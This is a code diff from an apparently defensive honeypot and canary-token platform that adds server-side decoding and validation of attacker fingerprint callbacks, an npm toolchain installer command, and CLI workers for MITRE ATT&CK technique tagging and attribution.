        fp_meta, parsed_fp = _extract_fingerprint(request.query_params)
        merged_headers = dict(request.headers)
        if fp_meta:
            merged_headers.update(fp_meta)
        await _record_hit(
            repo, bus,
            slug=slug,
@@ -111,7 +156,9 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI:
            user_agent=request.headers.get("user-agent"),
            request_path=str(request.url.path),
            dns_qname=None,
-            raw_headers=dict(request.headers),
+            raw_headers=merged_headers,
            parsed_fp=parsed_fp,
            raw_nonce=raw_nonce,
        )
        # Always 200 with a tiny image so the attacker's client sees
        # a "success" — same return regardless of whether the slug is
@@ -129,6 +176,67 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI:
    return app
 # Per-chunk size cap.  Real fingerprints fit in one ~3KB GET; honest
 # overflow is handled via chunking (s/i/n + d).  Anything larger than
 # this on a single request is junk, so we drop it instead of letting an
 # attacker inflate a trigger row indefinitely.
 _FP_CHUNK_MAX = 8 * 1024
 def _extract_fingerprint(qp: Any) -> tuple[dict[str, Any], Optional[dict]]:
    """Decode fingerprint-payload query params into (meta_dict, parsed_fp).
    The obfuscated browser payload may send three shapes on ``GET /c/<slug>``:
    * ``?o=1`` — bare-open beacon, fired before fingerprinting starts.
    * ``?d=<b64url-json>`` — single-shot fingerprint dump.
    * ``?s=<sid>&i=<idx>&n=<total>&d=<b64url-chunk>`` — chunked dump.
    Returns a tuple of:
    - ``meta`` — flat dict with ``_fp_*`` keys to merge into raw_headers.
    - ``parsed_fp`` — the decoded fingerprint dict for validation, or ``None``
      when there's no ``?d=`` or decoding fails.
    """
    out: dict[str, Any] = {}
    parsed_fp: Optional[dict] = None
    if not qp:
        return out, parsed_fp
    o = qp.get("o") if hasattr(qp, "get") else None
    if o:
        out["_fp_open"] = "1"
    d = qp.get("d") if hasattr(qp, "get") else None
    if not d:
        return out, parsed_fp
    if len(d) > _FP_CHUNK_MAX:
        out["_fp_oversize"] = "1"
        return out, parsed_fp
    sid = qp.get("s")
    idx = qp.get("i")
    total = qp.get("n")
    if sid and idx and total:
        out["_fp_sid"] = sid
        out["_fp_idx"] = idx
        out["_fp_total"] = total
        out["_fp_chunk"] = d
        return out, parsed_fp
    # Single-shot: decode and pass back as parsed_fp; validation runs in
    # _record_hit after token lookup so we have the stored nonce at hand.
    try:
        padded = d + "=" * (-len(d) % 4)
        raw = base64.urlsafe_b64decode(padded.encode("ascii"))
        parsed = json.loads(raw.decode("utf-8"))
    except (binascii.Error, ValueError, UnicodeDecodeError):
        out["_fp_decode_error"] = "1"
        return out, parsed_fp
    if isinstance(parsed, dict):
        parsed_fp = parsed
    else:
        out["_fp_decode_error"] = "1"
    return out, parsed_fp
 def _client_ip(request: Request) -> str:
    # Honor X-Forwarded-For if the operator deployed behind a reverse
    # proxy. Take the leftmost address in the chain; everything after
@@ -154,16 +262,58 @@ async def _record_hit(
    request_path: Optional[str],
    dns_qname: Optional[str],
    raw_headers: Optional[dict],
    parsed_fp: Optional[dict] = None,
    raw_nonce: Optional[str] = None,
 ) -> None:
    """Resolve slug -> token, persist a trigger, publish on the bus.
    Unknown slugs are silently swallowed: returning the same response
    for known and unknown slugs is the stealth posture, and persisting
    every random scan would clutter the DB.
    When *parsed_fp* is present (single-shot fingerprint decode succeeded),
    it is validated through four layers before being merged into raw_headers:
    A) nonce match against CanaryToken.fingerprint_nonce,
    B) structural shape check,
    C) mint UUID consistency,
    D) per-(token, IP) rate limit.
    Each failure drops the structured ``_fp`` and sets a ``_fp_*_invalid`` flag.
    The trigger row always lands regardless — the GET hit is itself forensic.
    """
    token = await repo.get_canary_token_by_slug(slug)
    if token is None:
        return
    final_headers: dict[str, Any] = dict(raw_headers or {})
    if parsed_fp is not None:
        stored_nonce: Optional[str] = token.get("fingerprint_nonce")
        # Layer A — nonce
        if stored_nonce is not None and raw_nonce != stored_nonce:
            final_headers["_fp_invalid_nonce"] = "1"
            parsed_fp = None
        # Layer B — shape (only when nonce passed or no nonce enforced)
        if parsed_fp is not None and not _is_valid_fp_shape(parsed_fp):
            final_headers["_fp_invalid_shape"] = "1"
            parsed_fp = None
        # Layer C — mint UUID consistency
        if parsed_fp is not None:
            expected_mint = str(uuid.uuid5(_MINT_NAMESPACE, slug))
            if parsed_fp.get("mint") != expected_mint:
                final_headers["_fp_invalid_mint"] = "1"
                parsed_fp = None
        # Layer D — rate limit
        if parsed_fp is not None and not _fp_rate_allowed(token["uuid"], src_ip):
            final_headers["_fp_rate_limited"] = "1"
            parsed_fp = None
        if parsed_fp is not None:
            final_headers["_fp"] = parsed_fp
    trigger_id = await repo.record_canary_trigger({
        "token_uuid": token["uuid"],
        "occurred_at": datetime.now(timezone.utc),
@@ -171,7 +321,7 @@ async def _record_hit(
        "user_agent": user_agent,
        "request_path": request_path,
        "dns_qname": dns_qname,
-        "raw_headers": raw_headers or {},
+        "raw_headers": final_headers,
    })
    try:
        await bus.publish(
@@ -189,6 +339,22 @@ async def _record_hit(
    except Exception as e:  # noqa: BLE001 — best effort
        log.warning("canary.triggered publish failed slug=%s err=%s", slug, e)
    # Auto-deregister fingerprint canaries after the first valid fingerprint
    # is collected. Slug goes dark; the stealth posture means the attacker
    # sees the same 200 + GIF on the next hit — nothing reveals the revocation.
    # Guard: only fingerprint tokens have a non-NULL fingerprint_nonce; plain
    # http/dns canaries are NOT auto-revoked.
    if parsed_fp is not None and token.get("fingerprint_nonce") is not None:
        try:
            await repo.update_canary_token_state(token["uuid"], "revoked")
            await bus.publish(
                topics.canary(token["uuid"], topics.CANARY_REVOKED),
                {"token_id": token["uuid"], "trigger_id": trigger_id,
                 "reason": "fingerprint_collected"},
            )
        except Exception as e:  # noqa: BLE001 — trigger row already landed; best effort
            log.warning("canary.deregister failed token=%s err=%s", token["uuid"], e)
 # ---------------------------- DNS surface --------------------------------
@@ -214,7 +380,7 @@ async def _start_dns_server(
        local_addr=(_dns_bind(), _dns_port()),
    )
    log.info("canary.dns listening zone=%s port=%d", zone, _dns_port())
-    return transport  # type: ignore[return-value]
+    return transport
 # ---------------------------- entry point --------------------------------
--- a/decnet/cli/init.py
+++ b/decnet/cli/init.py
@@ -39,6 +39,7 @@ from . import (
    swarm,
    swarmctl,
    topology,
    ttp,
    updater,
    web,
    webhook,
@@ -59,7 +60,7 @@ for _mod in (
    swarm,
    deploy, lifecycle, workers, inventory,
    web, profiler, orchestrator, realism, reconciler, sniffer, db,
-    topology, bus, geoip, init, webhook, canary,
+    topology, bus, geoip, init, webhook, canary, ttp,
 ):
    _mod.register(app)
--- a/decnet/cli/canary.py
+++ b/decnet/cli/canary.py
@@ -1,8 +1,13 @@
 """``decnet canary`` — HTTP + DNS callback receiver for canary tokens.
-Worker process. Mirrors the shape of :mod:`decnet.cli.webhook`: a
+Two entry points share this module:
-``@app.command(name="canary")`` Typer entry point that delegates to
+
-:func:`decnet.canary.worker.run`.
+* ``decnet canary`` — runs the worker process. Mirrors the shape of
  :mod:`decnet.cli.webhook`. Invoked by the ``decnet-canary.service``
  systemd unit so its argv must stay stable.
 * ``decnet canary-install-toolchain`` — provisions the Node side of
  the fingerprint-canary obfuscator. Idempotent; safe to call from
  the API service unit's ``ExecStartPre``.
 Not master-only — any host that hosts deckies can run its own
 canary worker (the bus events stay local; the webhook worker on
@@ -11,11 +16,17 @@ in ``development/let-s-move-to-the-enumerated-pike.md``).
 """
 from __future__ import annotations
 import shutil
 import subprocess  # nosec B404 — npm exec is the whole point of the toolchain installer
 from pathlib import Path
 import typer
 from . import utils as _utils
 from .utils import console, log
 _TOOLCHAIN_TIMEOUT_S = 180
 def register(app: typer.Typer) -> None:
    @app.command(name="canary")
@@ -40,3 +51,53 @@ def register(app: typer.Typer) -> None:
            asyncio.run(run())
        except KeyboardInterrupt:
            console.print("\n[yellow]Canary worker stopped.[/]")
    @app.command(name="canary-install-toolchain")
    def canary_install_toolchain(
        npm_bin: str = typer.Option(
            "npm", "--npm-bin", help="Path to the npm executable. Defaults to PATH lookup.",
        ),
    ) -> None:
        """Install the Node-side toolchain used by fingerprint canaries.
        Runs ``npm install --omit=dev`` under the installed ``decnet/canary/``
        directory so the obfuscator's helper script can ``require()``
        ``javascript-obfuscator`` at mint time. Requires Node >= 18.
        Idempotent: re-running on an already-installed tree is fast
        (npm short-circuits when ``node_modules/`` is up-to-date).
        """
        import decnet.canary as _canary_pkg
        canary_dir = Path(_canary_pkg.__file__).resolve().parent
        if not (canary_dir / "package.json").is_file():
            console.print(
                f"[red]canary package.json not found under {canary_dir}; "
                "wheel may be missing the JS toolchain payload.[/]"
            )
            raise typer.Exit(code=2)
        if shutil.which(npm_bin) is None:
            console.print(
                f"[red]npm executable {npm_bin!r} not found on PATH. "
                "Install Node >= 18 and re-run.[/]"
            )
            raise typer.Exit(code=2)
        console.print(
            f"[cyan]installing canary toolchain[/] in {canary_dir}",
        )
        try:
            proc = subprocess.run(  # nosec B603 — argv-form, no shell, fixed cwd, npm_bin checked above
                [npm_bin, "install", "--omit=dev", "--no-fund", "--no-audit"],
                cwd=str(canary_dir),
                capture_output=True, text=True,
                timeout=_TOOLCHAIN_TIMEOUT_S, check=False,
            )
        except subprocess.TimeoutExpired:
            console.print("[red]npm install timed out after 3 minutes[/]")
            raise typer.Exit(code=3) from None
        if proc.returncode != 0:
            console.print(
                f"[red]npm install failed rc={proc.returncode}[/]\n"
                f"{proc.stderr.strip()}"
            )
            raise typer.Exit(code=proc.returncode)
        console.print("[green]canary toolchain ready[/]")
--- a/decnet/cli/gating.py
+++ b/decnet/cli/gating.py
@@ -30,6 +30,10 @@ MASTER_ONLY_COMMANDS: frozenset[str] = frozenset({
    "mutate", "listener", "profiler",
    "services", "distros", "correlate", "archetypes", "web",
    "db-reset", "init", "webhook", "clusterer", "campaign-clusterer",
    # `ttp` runs on agents — local SMTP decoys persist .eml files into the
    # agent's artifacts tree and the EmailLifter disk-reaches them in-process
    # (DEBT-047). `ttp-backfill` stays master-only: it walks the master DB.
    "ttp-backfill",
 })
 MASTER_ONLY_GROUPS: frozenset[str] = frozenset(
    {"swarm", "topology", "geoip", "realism"}
@@ -65,7 +69,7 @@ def _gate_commands_by_mode(_app: typer.Typer) -> None:
        return
    _app.registered_commands = [
        c for c in _app.registered_commands
-        if (c.name or c.callback.__name__) not in MASTER_ONLY_COMMANDS
+        if (c.name or (c.callback.__name__ if c.callback else "")) not in MASTER_ONLY_COMMANDS
    ]
    _app.registered_groups = [
        g for g in _app.registered_groups
--- a/decnet/cli/init.py
+++ b/decnet/cli/init.py
@@ -44,6 +44,12 @@ _CONFIG_PLACEHOLDER = """\
 # EnvironmentFile= — never in a group-readable INI.
 [decnet]
 # DECNET-service user/group as configured at `decnet init` time.
 # Resolved to a uid/gid on each host at deploy time via pwd.getpwnam,
 # so the same user name can have different numeric uids on master vs
 # agents without breaking artifact ownership.
 api-user = {api_user}
 api-group = {api_group}
 # mode = master                          # or "agent"
 # [api]
@@ -74,6 +80,7 @@ _CONFIG_PLACEHOLDER = """\
 # master-host = 10.0.0.1
 # syslog-port = 6514
 # swarmctl-port = 8770
 # swarmctl-host = 127.0.0.1
 # [logging]
 # system-log = /var/log/decnet/decnet.system.log
@@ -197,14 +204,17 @@ def _ensure_dir(
    return f"skip: {path} already present" if existed else "ok"
-def _ensure_config(path: Path, group: str, *, dry_run: bool) -> str:
+def _ensure_config(
    path: Path, group: str, *, user: str, dry_run: bool,
 ) -> str:
    if path.exists():
        return f"skip: {path} already present"
    if dry_run:
        console.print(f"  [dim]would write:[/] {path}")
        return "ok"
    path.parent.mkdir(parents=True, exist_ok=True)
-    path.write_text(_CONFIG_PLACEHOLDER)
+    rendered = _CONFIG_PLACEHOLDER.format(api_user=user, api_group=group)
    path.write_text(rendered)
    try:
        os.chmod(path, 0o640)
        gid = grp.getgrnam(group).gr_gid
@@ -601,7 +611,7 @@ def register(app: typer.Typer) -> None:
        # (Path("/").  / "/opt/decnet" == Path("/opt/decnet"), dropping pfx).
        _install_rel = install_dir.lstrip("/")
-        required_tools = ("systemctl",) if deinit else (
+        required_tools: tuple[str, ...] = ("systemctl",) if deinit else (
            "systemctl", "useradd", "groupadd", "systemd-tmpfiles",
        )
        if deinit:
@@ -658,7 +668,7 @@ def register(app: typer.Typer) -> None:
            )
            _step(
                "systemctl daemon-reload",
-                lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1],
+                lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1],  # type: ignore[func-returns-value]
            )
            _step(
                f"remove {etc_decnet / 'decnet.ini'}",
@@ -754,6 +764,13 @@ def register(app: typer.Typer) -> None:
            (pfx / _install_rel, 0o755, user, group),
            (pfx / "var/lib/decnet", 0o750, user, group),
            (pfx / "var/lib/decnet/geoip", 0o755, user, group),
            # DEBT-035 / DEBT-047: artifact root carries setgid (the
            # 0o2... bit) so every file written under it inherits the
            # decnet group regardless of which container's uid created
            # it. Group-write (0o2775) lets the API process and the
            # local TTP worker read each other's outputs without a
            # manual chown after every fresh deploy.
            (pfx / "var/lib/decnet/artifacts", 0o2775, user, group),
            (pfx / "var/log/decnet", 0o750, user, group),
            (etc_decnet, 0o755, "root", group),
            (pfx / "run/decnet", 0o755, "root", group),
@@ -775,12 +792,15 @@ def register(app: typer.Typer) -> None:
        for path, mode, d_owner, d_group in dirs:
            _step(
                f"ensure dir {path}",
-                lambda p=path, m=mode, o=d_owner, g=d_group:
+                lambda p=path, m=mode, o=d_owner, g=d_group:  # type: ignore[misc]
                    _ensure_dir(p, mode=m, owner=o, group=g, dry_run=dry_run),
            )
        _step(
            f"write {etc_decnet / 'decnet.ini'}",
-            lambda: _ensure_config(etc_decnet / "decnet.ini", group, dry_run=dry_run),
+            lambda: _ensure_config(
                etc_decnet / "decnet.ini", group,
                user=user, dry_run=dry_run,
            ),
        )
        _step(
            "install systemd units",
@@ -812,7 +832,7 @@ def register(app: typer.Typer) -> None:
        )
        _step(
            "systemctl daemon-reload",
-            lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1],
+            lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1],  # type: ignore[func-returns-value]
        )
        if no_start:
@@ -823,7 +843,7 @@ def register(app: typer.Typer) -> None:
            _step(
                "systemctl enable --now decnet.target",
                lambda: (
-                    _run(
+                    _run(  # type: ignore[func-returns-value]
                        ["systemctl", "enable", "--now", "decnet.target"],
                        dry_run=dry_run,
                    ),
--- a/decnet/cli/swarmctl.py
+++ b/decnet/cli/swarmctl.py
@@ -16,8 +16,16 @@ from .utils import console, log
 def register(app: typer.Typer) -> None:
    @app.command()
    def swarmctl(
-        port: int = typer.Option(8770, "--port", help="Port for the swarm controller"),
+        port: int = typer.Option(
-        host: str = typer.Option("127.0.0.1", "--host", help="Bind address for the swarm controller"),
+            8770, "--port",
            envvar="DECNET_SWARMCTL_PORT",
            help="Port for the swarm controller. Defaults to [swarm] swarmctl-port from /etc/decnet/decnet.ini, else 8770.",
        ),
        host: str = typer.Option(
            "127.0.0.1", "--host",
            envvar="DECNET_SWARMCTL_HOST",
            help="Bind address for the swarm controller. Defaults to [swarm] swarmctl-host from /etc/decnet/decnet.ini, else 127.0.0.1.",
        ),
        daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"),
        no_listener: bool = typer.Option(False, "--no-listener", help="Do not auto-spawn the syslog-TLS listener alongside swarmctl"),
        tls: bool = typer.Option(False, "--tls", help="Serve over HTTPS with mTLS (required for cross-host worker heartbeats)"),
--- a/decnet/cli/topology.py
+++ b/decnet/cli/topology.py
@@ -233,8 +233,8 @@ def _delete(
        topo = await repo.get_topology(topology_id)
        if topo is None:
            return False, "not-found"
-        if topo["status"] in _RUNNING:
+        if topo.status in _RUNNING:
-            return False, str(topo["status"])
+            return False, str(topo.status)
        ok = await repo.delete_topology_cascade(topology_id)
        return ok, None
--- a/decnet/cli/ttp.py
+++ b/decnet/cli/ttp.py
@@ -0,0 +1,309 @@
 """``decnet ttp`` — TTP-tagging worker and admin commands.
 Two flat commands share this module:
 * ``decnet ttp`` — runs the long-running tagger worker. Bus-woken on
  ``attacker.session.ended`` / ``attacker.observed`` /
  ``attacker.intel.enriched`` / ``identity.{formed,merged}`` /
  ``credential.reuse.detected`` / ``email.received`` / ``canary.>``;
  dispatches each event through :class:`CompositeTagger` (RuleEngine +
  Behavioral / Intel / CanaryFingerprint / Email / Identity / Credential
  lifters), persists ``ttp_tag`` rows via the idempotent
  ``INSERT OR IGNORE`` write, and publishes ``ttp.tagged`` +
  ``ttp.rule.fired.<technique_id>`` only when the insert returned a
  non-zero rowcount (loop-prevention invariant from TTP_TAGGING.md
  §"Bus topics"). Invoked by the ``decnet-ttp.service`` systemd unit
  so its argv must stay stable.
 * ``decnet ttp-backfill`` — replays historical events (shell commands
  recorded on :class:`Attacker.commands`, :class:`CanaryTrigger` rows)
  through the live tagger. Writes ``ttp_tag`` rows using the same
  idempotent insert path. **Does not publish** to the bus — replay must
  not re-trigger SIEM/webhook fan-out on already-attributed events.
 Both are master-only — gated via ``MASTER_ONLY_COMMANDS`` in
 :mod:`decnet.cli.gating`.
 """
 from __future__ import annotations
 import asyncio
 import time
 from datetime import datetime, timedelta, timezone
 from typing import Any
 import typer
 from decnet.ttp.factory import CompositeTagger, get_tagger
 from . import utils as _utils
 from .utils import console, log
 _BACKFILL_SOURCES = ("command", "canary", "all")
 def register(app: typer.Typer) -> None:
    @app.command(name="ttp")
    def ttp(
        poll_interval_secs: float = typer.Option(
            60.0, "--poll-interval", "-i",
            help="Slow-tick fallback when the bus is idle or unavailable (seconds)",
        ),
        daemon: bool = typer.Option(
            False, "--daemon", "-d",
            help="Detach to background as a daemon process",
        ),
    ) -> None:
        """TTP-tagging worker — MITRE ATT&CK technique tagging."""
        from decnet.ttp.worker import run_ttp_worker_loop
        from decnet.web.dependencies import repo
        if daemon:
            log.info("ttp daemonizing poll=%s", poll_interval_secs)
            _utils._daemonize()
        log.info("ttp command invoked poll=%s", poll_interval_secs)
        console.print(
            f"[bold cyan]TTP tagging worker starting[/] "
            f"poll={poll_interval_secs}s"
        )
        console.print("[dim]Press Ctrl+C to stop[/]")
        async def _run() -> None:
            await repo.initialize()
            await run_ttp_worker_loop(
                repo, poll_interval_secs=poll_interval_secs,
            )
        try:
            asyncio.run(_run())
        except KeyboardInterrupt:
            console.print("\n[yellow]TTP tagging worker stopped.[/]")
    @app.command(name="ttp-backfill")
    def ttp_backfill(
        since_days: int = typer.Option(
            7, "--since-days", "-s",
            min=1, max=3650,
            help="Replay events whose source row is newer than N days ago.",
        ),
        source: str = typer.Option(
            "all", "--source",
            help=f"Source slice to replay. One of: {', '.join(_BACKFILL_SOURCES)}.",
        ),
        dry_run: bool = typer.Option(
            False, "--dry-run",
            help="Run the tagger but skip insert_tags. Reports counts only.",
        ),
        batch_size: int = typer.Option(
            500, "--batch-size",
            min=1, max=100_000,
            help="Number of tags accumulated before each repo.insert_tags call.",
        ),
    ) -> None:
        """Replay historical attacker activity through the live tagger.
        Walks ``Attacker.commands`` (per-IP shell-command history) and
        ``CanaryTrigger`` (canary callback log) since N days ago,
        builds the same :class:`TaggerEvent` shape the live worker
        emits, and persists tags via the idempotent INSERT OR IGNORE
        write. Re-running is safe — a second pass over identical
        source rows reports ``inserted=0``.
        Bus publish is intentionally suppressed; SIEM / webhook fan-out
        sees only live events, never replays.
        """
        from decnet.cli.gating import _require_master_mode
        from decnet.web.dependencies import repo
        _require_master_mode("ttp-backfill")
        if source not in _BACKFILL_SOURCES:
            console.print(
                f"[red]invalid --source {source!r}; expected one of "
                f"{_BACKFILL_SOURCES}[/]"
            )
            raise typer.Exit(code=2)
        cutoff = datetime.now(tz=timezone.utc) - timedelta(days=since_days)
        console.print(
            f"[bold cyan]TTP backfill[/] since={cutoff.isoformat()} "
            f"source={source} dry_run={dry_run} batch_size={batch_size}"
        )
        async def _run() -> None:
            await repo.initialize()
            await _backfill(
                repo,
                cutoff=cutoff,
                sources=_resolve_sources(source),
                dry_run=dry_run,
                batch_size=batch_size,
            )
        try:
            asyncio.run(_run())
        except KeyboardInterrupt:
            console.print("\n[yellow]Backfill interrupted.[/]")
 def _resolve_sources(name: str) -> tuple[str, ...]:
    if name == "all":
        return ("command", "canary")
    return (name,)
 async def _backfill(
    repo: Any,
    *,
    cutoff: datetime,
    sources: tuple[str, ...],
    dry_run: bool,
    batch_size: int,
 ) -> None:
    """Drive the per-source backfill loops and report structured counts.
    One :class:`CompositeTagger` is built once and reused for every
    source — the per-lifter watch fan-out the live worker performs is
    inlined here as a `watch_store()` startup task per
    :class:`WatchableTagger`, so the dispatch indexes hydrate before
    we start feeding events.
    """
    # Import-time bound so tests can monkeypatch ``decnet.cli.ttp.get_tagger``
    # to inject a recording fake without touching the global factory.
    tagger = get_tagger()
    watch_tasks: list[asyncio.Task[None]] = []
    if isinstance(tagger, CompositeTagger):
        for watchable in tagger.iter_watchables():
            watch_tasks.append(asyncio.create_task(watchable.watch_store()))
    # Yield once so each watch_store gets a chance to run its
    # initial `load_compiled` before we feed the first event.
    await asyncio.sleep(0.05)
    try:
        if "command" in sources:
            await _backfill_commands(
                repo, tagger, cutoff=cutoff,
                dry_run=dry_run, batch_size=batch_size,
            )
        if "canary" in sources:
            await _backfill_canaries(
                repo, tagger, cutoff=cutoff,
                dry_run=dry_run, batch_size=batch_size,
            )
    finally:
        for task in watch_tasks:
            task.cancel()
        for task in watch_tasks:
            try:
                await task
            except (asyncio.CancelledError, Exception):  # noqa: BLE001
                pass
 async def _backfill_commands(
    repo: Any,
    tagger: Any,
    *,
    cutoff: datetime,
    dry_run: bool,
    batch_size: int,
 ) -> None:
    from decnet.ttp.base import TaggerEvent
    started = time.monotonic()
    rows_seen = 0
    cmds_seen = 0
    inserted = 0
    pending: list[Any] = []
    async for attacker, commands in repo.iter_attacker_commands_since(cutoff):
        rows_seen += 1
        for idx, cmd in enumerate(commands):
            cmds_seen += 1
            text = cmd.get("command_text") or cmd.get("text")
            if not isinstance(text, str):
                continue
            cmd_id = (
                cmd.get("id")
                or cmd.get("uuid")
                or cmd.get("command_id")
                or f"{attacker.uuid}#cmd{idx}"
            )
            event = TaggerEvent(
                source_kind="command",
                source_id=str(cmd_id),
                attacker_uuid=attacker.uuid,
                identity_uuid=getattr(attacker, "identity_id", None),
                session_id=cmd.get("session_id"),
                decky_id=cmd.get("decky_id") or cmd.get("decky"),
                payload={**cmd, "command_text": text},
            )
            tags = await tagger.tag(event)
            if tags:
                pending.extend(tags)
            if len(pending) >= batch_size:
                inserted += await _flush(repo, pending, dry_run)
                pending = []
    if pending:
        inserted += await _flush(repo, pending, dry_run)
    elapsed = time.monotonic() - started
    console.print(
        f"source=command rows={rows_seen} commands={cmds_seen} "
        f"inserted={inserted} dry_run={dry_run} elapsed_s={elapsed:.2f}"
    )
 async def _backfill_canaries(
    repo: Any,
    tagger: Any,
    *,
    cutoff: datetime,
    dry_run: bool,
    batch_size: int,
 ) -> None:
    from decnet.ttp.base import TaggerEvent
    started = time.monotonic()
    rows_seen = 0
    inserted = 0
    pending: list[Any] = []
    async for trigger in repo.iter_canary_triggers_since(cutoff):
        rows_seen += 1
        event = TaggerEvent(
            source_kind="canary_fingerprint",
            source_id=trigger.uuid,
            attacker_uuid=trigger.attacker_id,
            identity_uuid=None,
            session_id=None,
            decky_id=None,
            payload={
                "token_uuid": trigger.token_uuid,
                "src_ip": trigger.src_ip,
                "ua_signature": trigger.user_agent or "",
                "user_agent": trigger.user_agent,
                "request_path": trigger.request_path,
                "dns_qname": trigger.dns_qname,
                "headers": trigger.headers(),
            },
        )
        tags = await tagger.tag(event)
        if tags:
            pending.extend(tags)
        if len(pending) >= batch_size:
            inserted += await _flush(repo, pending, dry_run)
            pending = []
    if pending:
        inserted += await _flush(repo, pending, dry_run)
    elapsed = time.monotonic() - started
    console.print(
        f"source=canary rows={rows_seen} inserted={inserted} "
        f"dry_run={dry_run} elapsed_s={elapsed:.2f}"
    )
 async def _flush(repo: Any, tags: list[Any], dry_run: bool) -> int:
    if dry_run:
        return 0
    return int(await repo.insert_tags(tags))
--- a/decnet/cli/utils.py
+++ b/decnet/cli/utils.py
@@ -11,7 +11,7 @@ import signal
 import subprocess  # nosec B404
 import sys
 from pathlib import Path
-from typing import Optional
+from typing import Any, Callable, Optional
 import typer
 from rich.console import Console
@@ -96,7 +96,7 @@ def _is_running(match_fn) -> int | None:
    return None
-def _service_registry(log_file: str) -> list[tuple[str, callable, list[str]]]:
+def _service_registry(log_file: str) -> list[tuple[str, Callable[..., Any], list[str]]]:
    """Return the microservice registry for health-check and relaunch.
    On agents these run as systemd units invoking /usr/local/bin/decnet,
@@ -195,7 +195,7 @@ _DEFAULT_SWARMCTL_URL = "http://127.0.0.1:8770"
 def _swarmctl_base_url(url: Optional[str]) -> str:
-    return url or os.environ.get("DECNET_SWARMCTL_URL", _DEFAULT_SWARMCTL_URL)
+    return url or os.environ.get("DECNET_SWARMCTL_URL") or _DEFAULT_SWARMCTL_URL
 def _http_request(method: str, url: str, *, json_body: Optional[dict] = None, timeout: float = 30.0):
--- a/decnet/cli/workers.py
+++ b/decnet/cli/workers.py
@@ -192,6 +192,70 @@ def register(app: typer.Typer) -> None:
        except KeyboardInterrupt:
            console.print("\n[yellow]Reuse correlator stopped.[/]")
    @app.command(name="attribution")
    def attribution(
        multi_actor_tick_secs: float = typer.Option(
            60.0, "--multi-actor-tick", "-t",
            help=(
                "Cross-primitive multi_actor correlator tick interval (seconds). "
                "Walks attribution_state for identities flagged on >= 2 "
                "primitives and emits attribution.profile.multi_actor_suspected."
            ),
        ),
        daemon: bool = typer.Option(
            False, "--daemon", "-d",
            help="Detach to background as a daemon process",
        ),
    ) -> None:
        """Attribution engine v0 — per-(identity, primitive) state machine.
        Subscribes to ``attacker.observation.>`` and, for each event,
        ensures a stub identity row, runs the merger over the full
        per-(identity, primitive) observation series, upserts the
        derived state, and publishes
        ``attribution.profile.state_changed`` only on transition.
        Periodic tick fires
        ``attribution.profile.multi_actor_suspected`` when >= 2
        primitives flag the same identity.
        Closes DEBT-051. Bright-line scope: behavioural coherence and
        drift only — never persona attribution to natural persons.
        """
        import asyncio
        from decnet.correlation.attribution_worker import (
            run_attribution_loop,
        )
        from decnet.web.dependencies import repo
        if daemon:
            log.info(
                "attribution worker daemonizing tick=%s",
                multi_actor_tick_secs,
            )
            _utils._daemonize()
        log.info(
            "attribution worker command invoked tick=%s",
            multi_actor_tick_secs,
        )
        console.print(
            f"[bold cyan]Attribution engine starting[/] "
            f"multi_actor_tick={multi_actor_tick_secs}s"
        )
        console.print("[dim]Press Ctrl+C to stop[/]")
        async def _run() -> None:
            await repo.initialize()
            await run_attribution_loop(
                repo,
                multi_actor_tick_secs=multi_actor_tick_secs,
            )
        try:
            asyncio.run(_run())
        except KeyboardInterrupt:
            console.print("\n[yellow]Attribution engine stopped.[/]")
    @app.command(name="clusterer")
    def clusterer(
        poll_interval_secs: float = typer.Option(
@@ -295,3 +359,10 @@ def register(app: typer.Typer) -> None:
            asyncio.run(_run())
        except KeyboardInterrupt:
            console.print("\n[yellow]Campaign clusterer stopped.[/]")
    # ``decnet ttp`` and ``decnet ttp-backfill`` moved to
    # :mod:`decnet.cli.ttp` — the TTP CLI surface (worker + admin verbs)
    # is colocated there, mirroring the per-feature CLI split used by
    # :mod:`decnet.cli.canary`, :mod:`decnet.cli.webhook`, etc. The
    # ``decnet-ttp.service`` systemd unit's ExecStart still resolves to
    # ``decnet ttp`` because the command name is unchanged.
--- a/decnet/clustering/campaign/impl/connected_components.py
+++ b/decnet/clustering/campaign/impl/connected_components.py
@@ -66,7 +66,10 @@ def cluster_identities(
    return {f.identity_uuid: f"cmp-{find(f.identity_uuid)}" for f in feat_list}
-def from_identity_row(row: dict[str, Any]) -> IdentityFeatures:
+def from_identity_row(
    row: dict[str, Any],
    ttp_decky_phases: list[dict[str, Any]] | None = None,
 ) -> IdentityFeatures:
    """Project an ``AttackerIdentity`` projection row dict into an
    :class:`IdentityFeatures`.
@@ -75,20 +78,59 @@ def from_identity_row(row: dict[str, Any]) -> IdentityFeatures:
    ja3_hashes / hassh_hashes / payload_simhashes / c2_endpoints
    (JSON list[str] or null).
-    Phase-handoff fields stay empty until the production-row adapter
+    *ttp_decky_phases* is the optional per-identity payload from
-    learns to mine logs for per-decky phase sequences (TODO.md
+    :meth:`BaseRepository.list_ttp_decky_phases` — one row per
-    "production-side payload + C2 + commands joins"). Without those,
+    ``ttp_tag`` carrying ``(decky_id, tactic, created_at_ts)``. When
-    the campaign clusterer falls back to shared-infra + temporal
+    provided, the adapter projects ``tactic`` → :class:`UKCPhase` and
-    overlap + cohort signals on production data; the fixture path
+    populates :attr:`IdentityFeatures.first_phase_per_decky` /
-    exercises the full feature set via :func:`from_synthetic_identity`.
+    ``last_phase_per_decky`` / ``first_seen_per_decky`` /
    ``last_seen_per_decky` so the production phase-handoff edge
    finally fires. The synthetic fixture path
    (:func:`from_synthetic_identity`) is unchanged — fixtures keep
    emitting UKC directly.
    """
    from decnet.clustering.ukc import tactic_to_ukc_phase  # noqa: PLC0415
    payload_hashes = _parse_json_list(row.get("payload_simhashes"))
    c2_endpoints = _parse_json_list(row.get("c2_endpoints"))
    first_phase_per_decky: dict[str, str] = {}
    last_phase_per_decky: dict[str, str] = {}
    first_seen_per_decky: dict[str, float] = {}
    last_seen_per_decky: dict[str, float] = {}
    decky_set: set[str] = set()
    # Rows arrive ordered by ``created_at``; ``setdefault`` preserves
    # the FIRST observation per decky, plain assignment captures the
    # LAST. Tags whose tactic is outside the ATT&CK→UKC map (or whose
    # phase is pre-target / unobservable) are dropped — they should
